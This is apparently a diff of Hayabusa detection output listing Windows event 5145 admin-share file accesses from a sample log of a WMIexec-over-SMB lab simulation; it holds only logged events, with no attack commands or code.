+2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
